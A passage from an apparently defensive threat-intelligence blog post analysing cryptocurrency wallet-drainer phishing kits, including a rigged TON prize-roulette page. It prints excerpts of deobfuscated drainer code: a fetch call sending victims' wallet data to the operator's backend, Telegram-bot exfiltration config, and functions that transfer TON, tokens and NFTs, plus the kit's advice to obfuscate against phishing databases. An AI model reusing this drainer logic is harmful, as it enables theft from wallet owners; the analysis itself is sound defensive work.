        fetch(<strong>"http://ethers.ddns.net:3000/backend/swap"</strong>, {
          'method': "POST"
          'body': JSON.stringify({
            'address': this.walletAddress,
            'walletBalanceInEth': this.walletBalanceInEth,
            [...]
            'transferName': "PANCAKESWAP",
            'transactionHash': _0x2887e2
          })
        });</code></pre><pre><code>[<strong>"transferERC20sushiswap"</strong>] = async () =&gt; {
    try {
      if (this.sushiswapTokens.length &gt; 0) {
        console.log(<strong>"TRANSFERRING APPROVED SUSHISWAP ERC20 TOKENS"</strong>);
        console.table(this.sushiswapTokens);
        <strong>[...]</strong></code></pre><p>And that&#8217;s it. What started as a simple HTML template with nothing fancy to show turned out to be a complete draining suite, featuring multichain compatibility, obfuscated code, dedicated support for leading protocols, seamless integration with top NFT markets, <a href="https://en.wikipedia.org/wiki/Heartbeat_(computing)">heartbeat</a> and home-calling capabilities. Who would have guessed? </p><p>It&#8217;s time to unplug this replicant and let it return to the <code>init 0</code> from which we should never have brought it back.</p><div><hr></div><h2>&#129514; <em>Dr Ainer</em>, administering TONic</h2><p>It seems our next patient has a history of good &#8216;private practices&#8217; on the surface, looking fresh and flawless. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!Fyt_!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!Fyt_!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png 424w, https://substackcdn.com/image/fetch/$s_!Fyt_!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png 848w, https://substackcdn.com/image/fetch/$s_!Fyt_!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png 1272w, https://substackcdn.com/image/fetch/$s_!Fyt_!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!Fyt_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png" width="616" height="320.6923076923077" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/736660cd-8485-44f6-846c-0fa02d85ad2a_3332x1734.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:758,&quot;width&quot;:1456,&quot;resizeWidth&quot;:616,&quot;bytes&quot;:3430829,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!Fyt_!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png 424w, https://substackcdn.com/image/fetch/$s_!Fyt_!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png 848w, https://substackcdn.com/image/fetch/$s_!Fyt_!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png 1272w, https://substackcdn.com/image/fetch/$s_!Fyt_!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F88e12b36-088e-4ffc-afba-f6bc1b43e8a8_3332x1734.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>There&#8217;s not much to say about the HTML landing page, which comes bundled with an installation manual in HTML format.</p><p>The template simulates a prize roulette that &#8212;thanks to a JavaScript manipulation&#8212; always yields the same reward: 100 <a href="https://en.wikipedia.org/wiki/The_Open_Network">TON</a>. And, as you may have guessed, in order to claim it, you&#8217;ll need to connect your wallet. </p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!arig!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!arig!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png 424w, https://substackcdn.com/image/fetch/$s_!arig!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png 848w, https://substackcdn.com/image/fetch/$s_!arig!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png 1272w, https://substackcdn.com/image/fetch/$s_!arig!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!arig!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png" width="454" height="300.2760989010989" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/ccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png&quot;,&quot;srcNoWatermark&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/7e25d8a6-8f56-47d1-9a4c-7b983c9c9e79_1494x988.png&quot;,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:963,&quot;width&quot;:1456,&quot;resizeWidth&quot;:454,&quot;bytes&quot;:457508,&quot;alt&quot;:null,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" srcset="https://substackcdn.com/image/fetch/$s_!arig!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png 424w, https://substackcdn.com/image/fetch/$s_!arig!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png 848w, https://substackcdn.com/image/fetch/$s_!arig!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png 1272w, https://substackcdn.com/image/fetch/$s_!arig!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2Fccb1c92f-f407-4995-8f77-03c546c257ee_1494x988.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a></figure></div><p>The facial reconstruction work done here looks professional, but let&#8217;s take a closer look at the stitches inside holding it all together. Once again there is no backend and all the workload is offloaded to JavaScript libraries:</p><ul><li><p><strong>nfts_whitelist.js</strong></p></li><li><p><strong>web3.js</strong></p></li><li><p><strong>spin-wheel.js</strong> (the rigged spinwheel)</p></li></ul><p>The <code>nfts_whitelist.json</code> file contains an allow-list for 15 NFT projects hosted on the TON blockchain, including <a href="https://tonviewer.com/EQAl_hUCAeEv-fKtGxYtITAS6PPxuMRaQwHj0QAHeWe6ZSD0?section=overview">Lost Dogs</a>, <a href="https://tonviewer.com/EQAOQdwdw8kGftJCSFgOErM1mBjYPe4DBPq8-AhF6vr9si5N?section=overview">Anonymous Telegram Numbers</a> and <a href="https://tonviewer.com/EQCU3idfp--Bs5x2QId5v0ac5JOwFiKu5g1O7UIEqd9SrWUA?section=overview">Rocket Cosmonauts</a>, which are of interest to the Threat Actor.</p><pre><code>[
    {
      "nft_platform": "Anonymous Telegram Numbers",
      "nft_address": "<strong>EQAOQdwdw8kGftJCSFgOErM1mBjYPe4DBPq8-AhF6vr9si5N</strong>",
      "contract": "EQAOQdwdw8kGftJCSFgOErM1mBjYPe4DBPq8-AhF6vr9si5N",
      "average_price": 210.6915,
      "rank": 1
    }<strong>,[...]</strong>
    {
      "nft_platform": "Lost Dogs",
      "nft_address": "<strong>EQAl_hUCAeEv-fKtGxYtITAS6PPxuMRaQwHj0QAHeWe6ZSD0</strong>",
      "contract": "EQAl_hUCAeEv-fKtGxYtITAS6PPxuMRaQwHj0QAHeWe6ZSD0",
      "average_price": 1.4226,
      "rank": 3
    }<strong>,[...]</strong>
    {
      "nft_platform": "Rocket Cosmonauts NFT",
      "nft_address": "<strong>EQCU3idfp--Bs5x2QId5v0ac5JOwFiKu5g1O7UIEqd9SrWUA</strong>",
      "contract": "EQCU3idfp--Bs5x2QId5v0ac5JOwFiKu5g1O7UIEqd9SrWUA",
      "average_price": 360.0000
      "rank": 6
    }<strong>,[...]</strong>
]</code></pre><p>The <code>web3.js</code> file appears to handle the ruse, but it is obfuscated. Perhaps the <code>install.html</code> file could shed some light on how to access it&#8230;</p><pre><code>&lt;p&gt;&lt;br&gt;Great, the configuration of the script has been successfully completed, now it must be obfuscated so that the code does not get into phishing databases, and simply so that no one steals it from your site, which, of course, is very important.&lt;/p&gt;

&lt;p&gt;To do this, we need the following site: &lt;a href="https://obfuscator.io"&gt;obfuscator.io&lt;/a&gt;&lt;/p&gt;

&lt;p&gt;Open the contents of the "&lt;b&gt;web3.js&lt;/b&gt;" file again, where we set up the &lt;b&gt;CF&lt;/b&gt; &amp; &lt;b&gt;TG&lt;/b&gt; variables, completely copy all the contents and paste it into &lt;a href="https://obfuscator.io"&gt;obfuscator.io&lt;/a&gt;&lt;/p&gt;</code></pre><p>Good tip; we wouldn&#8217;t want anyone stealing the code. Now, with the file deobfuscated, it looks like this:</p><pre><code>// Using this code without obsfuscation is strictly prohibited !
// If this is discovered, an arbitration will be written
[...]
const CF = {
    Wallet: "UQY<strong>[...]</strong>FxZfi",  // Wallet address where the assets will go
    Native: true,
    Tokens: true,
    NFTs: true,
    Tokens_First: false,
    Ton_rate: 7.99, // conversion rate ( 1 TON to USD = 7.99 )
    TonApi_Key: "", // https://tonconsole.com/ (RECOMMENDED), 
    manifestUrl: "https://app.storm.tg/tonconnect-manifest.json"
}

const TG = {
    token: "", // Your @Botfather Bot token
    chat_id: "", // ID of the chat for notifications
    enter_website: false,
    connect_success: false,
    connect_empty: false,
    transfer_request: false,
    transfer_success: false,
    transfer_cancel: false
};
// ==================================================================
// ========= Bring changes to the code below is not sure ============
// ==================================================================
<strong>[...]</strong></code></pre><p>A rather simple configuration that once again relies on our old friend, Telegram, and its <a href="https://core.telegram.org/bots/api">bots</a> to serve as the communication channel between the drainer instance and the operator. The rest of the file is dedicated to querying <a href="https://ipapi.co">IP-API</a>, <a href="https://tonapi.io">TON API</a>, and <a href="https://tonviewer.com">TonViewer</a> to retrieve information on a user&#8217;s location and assets, as well as the Telegram API to send the following messages to the operator:</p><blockquote><p>&#128268; <strong>User Connected Wallet</strong> ([Shortened Address])</p><p>&#127757; [Host] - &#128205; [Country Link to IP-API]</p><p>&#128178; (&#8776; [Total Balance in USD])</p><p>&#129535; [TON Balance Information]</p><p>&#129689; [Token Balance Information]</p><p>&#128126; [NFT Balance Information]</p></blockquote><blockquote><p>&#9989; <strong>Approved Transfer</strong> ([Shortened Address])</p><p>&#128126; (&#8776; [Total NFT Price] USD)</p><p>[NFT List with Price Information and Links]</p></blockquote><blockquote><p>&#10060; <strong>Declined Transfer</strong> ([Shortened Address])</p><p>&#128126; (&#8776; [Total NFT Price] USD)</p><p>[NFT List with Price Information and Links]</p></blockquote><blockquote><p><strong>&#128064; User opened the website</strong></p><p>&#127757; [User Language] | [Host]</p><p>&#128205; [Country Link to IP-API]</p></blockquote><blockquote><p>&#128268;&#128169; <strong>User Connected an Empty Wallet</strong> ([Shortened Address])</p><p>&#127757; [Host] - &#128205; [Country Link to IP-API]</p></blockquote><p>The drain happens at the following functions:</p><pre><code>async function <strong>TokenTransfer</strong>(tokenChunk, sourceArray) {
try {
  const totalTokenPriceUSD = tokenChunk.reduce((sum, token) =&gt; 
  sum + token.calculatedBalanceUSDTG, 0);</code></pre><pre><code>async function <strong>NftTransfer</strong>(nftChunk, sourceArray) {
try {
  const totalNftPriceUSD = nftChunk.reduce((sum, token) =&gt; 
  sum + token.calculatedBalanceUSDTG, 0);</code></pre><pre><code>async function <strong>handleTransaction</strong>(transactionData, notif, successMessage, errorMessage) {
try {
  if(TG.transfer_request){
    await TgMsg(notif);
  }
  await w3.sendTransaction(transactionData);
  await sleep(1300);
  if(TG.transfer_success){
    await TgMsg(successMessage);
  }
} <strong>[...]</strong></code></pre><pre><code>async function <strong>processAssets</strong>(walletData, tokenData, nftData) {
<strong>[...]</strong>
for (let type of sortedTypes) {
  switch (type) {
  <strong>case "TON":</strong>
    if (groupedData.TON.length &gt; 0 &amp;&amp; CF.Native) {
      await <strong>TonTransfer</strong>(groupedData.TON[0]);
      await sleep(1300);
    } break;
  <strong>case "TOKEN":</strong>
    if(CF.Tokens){
      for (let i = 0; i &lt; groupedData.TOKEN.length; i += 4) {
        let chunk = groupedData.TOKEN.slice(i, i + 4);
        await <strong>TokenTransfer</strong>(chunk, groupedData.TOKEN);
        await sleep(1300);
      }
    } break;
  <strong>case "NFT":</strong>
    if(CF.NFTs){
      for (let i = 0; i &lt; groupedData.NFT.length; i += 4) {
        let chunk = groupedData.NFT.slice(i, i + 4);
        await <strong>NftTransfer</strong>(chunk, groupedData.NFT);
        await sleep(1300);
      }
    } break;
  }
}</code></pre><p>The deobfuscated files containted <a href="https://tonviewer.com/UQBY2mp_z9atz0k2bdp0TIZ-2Jif-TQsRdP0LY28pa7FxZfi?section=nfts">the operator&#8217;s TON address</a>, which still shows activity to this day&#8212;but my license only allows me to practice on droids, so that&#8217;s as far as we&#8217;ll get today.</p><p>We&#8217;ve seen it all: drainers, obfuscated code, esoteric programming languages, Russian blockchains, a hacked minister&#8217;s account, and we even stitched together our very own Frankenstein&#8217;s monster. I&#8217;d say that&#8217;s enough excitement for a single article, so it&#8217;s time to part ways.</p><div><hr></div><h2>&#128138; Down at the doctor&#8217;s</h2><p>I hope you enjoyed this article, and remember: if you need a trusty doc with swift hands and a <code>#nologs</code> policy, drop by the clinic.</p><p>We speak PHP and accept <a href="https://en.wikipedia.org/wiki/Monero">XMR</a> ; ) .</p><div class="captioned-image-container"><figure><a class="image-link image2 is-viewable-img" target="_blank" href="https://substackcdn.com/image/fetch/$s_!arKW!,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png" data-component-name="Image2ToDOM"><div class="image2-inset"><picture><source type="image/webp" srcset="https://substackcdn.com/image/fetch/$s_!arKW!,w_424,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!arKW!,w_848,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!arKW!,w_1272,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!arKW!,w_1456,c_limit,f_webp,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png 1456w" sizes="100vw"><img src="https://substackcdn.com/image/fetch/$s_!arKW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png" width="414" height="414" data-attrs="{&quot;src&quot;:&quot;https://substack-post-media.s3.amazonaws.com/public/images/2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png&quot;,&quot;srcNoWatermark&quot;:null,&quot;fullscreen&quot;:null,&quot;imageSize&quot;:null,&quot;height&quot;:1024,&quot;width&quot;:1024,&quot;resizeWidth&quot;:414,&quot;bytes&quot;:1775982,&quot;alt&quot;:&quot;&quot;,&quot;title&quot;:null,&quot;type&quot;:&quot;image/png&quot;,&quot;href&quot;:null,&quot;belowTheFold&quot;:true,&quot;topImage&quot;:false,&quot;internalRedirect&quot;:null,&quot;isProcessing&quot;:false,&quot;align&quot;:null,&quot;offset&quot;:false}" class="sizing-normal" alt="" title="" srcset="https://substackcdn.com/image/fetch/$s_!arKW!,w_424,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png 424w, https://substackcdn.com/image/fetch/$s_!arKW!,w_848,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png 848w, https://substackcdn.com/image/fetch/$s_!arKW!,w_1272,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png 1272w, https://substackcdn.com/image/fetch/$s_!arKW!,w_1456,c_limit,f_auto,q_auto:good,fl_progressive:steep/https%3A%2F%2Fsubstack-post-media.s3.amazonaws.com%2Fpublic%2Fimages%2F2b79e412-9c89-4ab9-9d31-a96bc0cbd9b1_1024x1024.png 1456w" sizes="100vw" loading="lazy"></picture><div class="image-link-expand"><div class="pencraft pc-display-flex pc-gap-8 pc-reset"><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container restack-image"><svg role="img" width="20" height="20" viewBox="0 0 20 20" fill="none" stroke-width="1.5" stroke="var(--color-fg-primary)" stroke-linecap="round" stroke-linejoin="round" xmlns="http://www.w3.org/2000/svg"><g><title></title><path d="M2.53001 7.81595C3.49179 4.73911 6.43281 2.5 9.91173 2.5C13.1684 2.5 15.9537 4.46214 17.0852 7.23684L17.6179 8.67647M17.6179 8.67647L18.5002 4.26471M17.6179 8.67647L13.6473 6.91176M17.4995 12.1841C16.5378 15.2609 13.5967 17.5 10.1178 17.5C6.86118 17.5 4.07589 15.5379 2.94432 12.7632L2.41165 11.3235M2.41165 11.3235L1.5293 15.7353M2.41165 11.3235L6.38224 13.0882"></path></g></svg></button><button tabindex="0" type="button" class="pencraft pc-reset pencraft icon-container view-image"><svg xmlns="http://www.w3.org/2000/svg" width="20" height="20" viewBox="0 0 24 24" fill="none" stroke="currentColor" stroke-width="2" stroke-linecap="round" stroke-linejoin="round" class="lucide lucide-maximize2 lucide-maximize-2"><polyline points="15 3 21 3 21 9"></polyline><polyline points="9 21 3 21 3 15"></polyline><line x1="21" x2="14" y1="3" y2="10"></line><line x1="3" x2="10" y1="21" y2="14"></line></svg></button></div></div></div></a><figcaption class="image-caption">Disclaimer: Do not sign contracts with Dr Ainer, he is not a real doctor.</figcaption></figure></div><p><em>All IOCs collected during this investigation are available on our <strong>Level Blue</strong> (formerly AlienVault OTX) profile, should they come in handy.</em></p>]]></content:encoded></item></channel></rss>